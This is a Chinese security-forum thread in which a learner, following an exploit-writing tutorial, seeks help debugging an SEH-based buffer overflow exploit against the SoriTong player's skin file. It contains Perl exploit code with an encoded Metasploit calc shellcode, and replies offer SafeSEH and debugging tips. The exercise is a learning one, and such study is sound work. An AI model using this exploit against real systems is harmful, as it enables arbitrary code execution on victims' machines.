首页
社区
课程
招聘
[旧帖] [求助]《exploit编写系列教程》中的测试实例问题 0.00雪花
发表于: 2010-12-15 19:10 1746

[旧帖] [求助]《exploit编写系列教程》中的测试实例问题 0.00雪花

2010-12-15 19:10
1746
在《exploit编写系列教程》的第三篇,基于SEH的exploit中,是以SoriTong软件为例,修改skin文件中的一个ui.txt。软件打开时会出现缓冲区溢出。当我使用Metasploit生产的payload时,调试会出现问题。使用windbg调试。
    当shellcode全部用字母“B”时,能调试到seh的断点处    exploit生成文件如下:
    my $junk="A"x584;
      my $nextSEHoverwrite="\xCC\xCC\xCC\xCC";
      my $SEHoverwrite=pack('V',0x02fdbf96);
      my $shellcode="B"x343;
      my $junk2="\x90"x1000;
      open(myfile,">ui.txt");
      print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;

     调试结果如下:
   
    当shellcode使用由mestasploit生成的,用来调用calc。badchar为\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e。
   exploit生成文件如下:
my $junk="A"x584;
my $nextSEHoverwrite="\xeb\x06\x90\x90";
my $SEHoverwrite=pack('V',0x02fdbf96);
my $shellcode="\x41\x92\x44\x0e\x1e\x4e\xd6\x4c\x51\x47\x99\x1e\xf5\x52" .
"\x46\x44\x58\x06\x37\x90\x06\x9f\x4c\x53\x4a\x9b\x4e\x97" .
"\x57\x4c\x5e\x97\xf5\x5d\x4b\x96\x5b\x99\x44\x0e\x50\x4a" .
"\x43\x5f\x3f\x58\x45\xf8\x42\x5a\x5b\x4b\xfd\x55\x92\x51" .
"\x54\x40\x4c\x52\xf8\x49\x90\x50\x5f\x98\x5e\x50\x44\x4a" .
"\x52\x54\x41\x52\x3f\x45\x59\x56\x06\x49\x55\x5b\x51\x1e" .
"\xf9\x37\x49\x44\x96\x5f\x3f\x4f\xf5\x9f\x51\xf8\x4e\x5b" .
"\x57\x96\x99\x3f\x51\x96\xf5\x5f\x4c\x99\x5a\x58\x45\x96" .
"\x9b\x2f\x4d\xfd\x91\x92\x37\x52\xda\xdf\xb8\x4c\x58\xc7" .
"\xa9\x31\xc9\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x45\x17\x03" .
"\x45\x17\x83\xa1\xa4\x25\x5c\xc5\xbd\x23\x9f\x35\x3e\x54" .
"\x29\xd0\x0f\x46\x4d\x91\x22\x56\x05\xf7\xce\x1d\x4b\xe3" .
"\x45\x53\x44\x04\xed\xde\xb2\x2b\xee\xee\x7a\xe7\x2c\x70" .
"\x07\xf5\x60\x52\x36\x36\x75\x93\x7f\x2a\x76\xc1\x28\x21" .
"\x25\xf6\x5d\x77\xf6\xf7\xb1\xfc\x46\x80\xb4\xc2\x33\x3a" .
"\xb6\x12\xeb\x31\xf0\x8a\x87\x1e\x21\xab\x44\x7d\x1d\xe2" .
"\xe1\xb6\xd5\xf5\x23\x87\x16\xc4\x0b\x44\x29\xe9\x81\x94" .
"\x6d\xcd\x79\xe3\x85\x2e\x07\xf4\x5d\x4d\xd3\x71\x40\xf5" .
"\x90\x22\xa0\x04\x74\xb4\x23\x0a\x31\xb2\x6c\x0e\xc4\x17" .
"\x07\x2a\x4d\x96\xc8\xbb\x15\xbd\xcc\xe0\xce\xdc\x55\x4c" .
"\xa0\xe1\x86\x28\x1d\x44\xcc\xda\x4a\xfe\x8f\xb0\x8d\x72" .
"\xaa\xfd\x8e\x8c\xb5\xad\xe6\xbd\x3e\x22\x70\x42\x95\x07" .
"\x80\xb3\x24\x9d\x15\x6a\xdd\xdc\x7b\x8d\x0b\x22\x82\x0e" .
"\xbe\xda\x71\x0e\xcb\xdf\x3e\x88\x27\xad\x2f\x7d\x48\x02" .
"\x4f\x54\x2b\xc5\xc3\x34\xac";
my $junk2="\x90"x1000;
open(myfile,">ui.txt");
print myfile $junk.$nextSEHoverwrite.$SEHoverwrite.$shellcode.$junk2;
#close(myfile);

调试结果如下:

一直debuggee is running,没法运行。
请问这是为什么?

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (12)
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
2
请重新上传图片
2010-12-15 19:33
0
雪    币: 37
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
额  能看到图片啊 那我用附件上传吧
2010-12-15 19:52
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
4
第一,请给出你的操作环境;
第二,确保ppt地址不受safeseh保护;
第三,在shellcode前加上\xCC断点,看是否可执行至此断点。
2010-12-15 19:54
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
5
网易限制了,我是伪造引用地址才能看见的
2010-12-15 19:55
0
雪    币: 37
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
XP SP3中文版,用\xcc试过,也是出现debuggee is running这种情况。关于ppt是否受safeseh影响的问题,我觉得用字母“B”字符串作为shellcode时,能正常调试且找到填充的位置。两者是使用相同的pop,pop,ret地址的。
2010-12-15 19:59
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
7
先用safeseh插件查看下是否受safeseh保护。

你是怎么用msf生成shellcode的,生成命令?
你过滤的bad char还真多
2010-12-15 20:08
0
雪    币: 37
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
我开始以为可能是badchar的原因,因为我在我电脑上试过servu的一个exploit,能成功,而且它的badchar就是这样的,所以就设成这个样子。 你使用msf的网页版,在payload的选项中,有个windows excute command,可以自己定制payload。
    如果是受到safeseh保护,为什么使用字符“B”它就没影响呢,而且也没执行到那里去啊。我下个sefeseh插件试下。
2010-12-15 20:21
0
雪    币: 37
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
使用的ppt地址是软件本身的,用插件看过,没有受safeseh保护。
2010-12-16 20:31
0
雪    币: 433
活跃值: (1870)
能力值: ( LV17,RANK:1820 )
在线值:
发帖
回帖
粉丝
10
直接用漏洞软件打开,不用windbg加载试试。
如果不行请上传漏洞软件,我调试下……
2010-12-16 22:20
0
雪    币: 209
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
后面shellcode大小的问题,我前面也遇到过,你的junk2的大小只要1000-shellcode的大小即可,你试试
2011-8-4 11:45
0
雪    币: 43
活跃值: (12)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
这个好学吗?我一点看不懂。
2011-8-4 12:11
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
lia
13
请教下 怎么图片的文字全部看不到啊
2011-8-4 23:35
0
游客
登录 | 注册 方可回帖
返回
//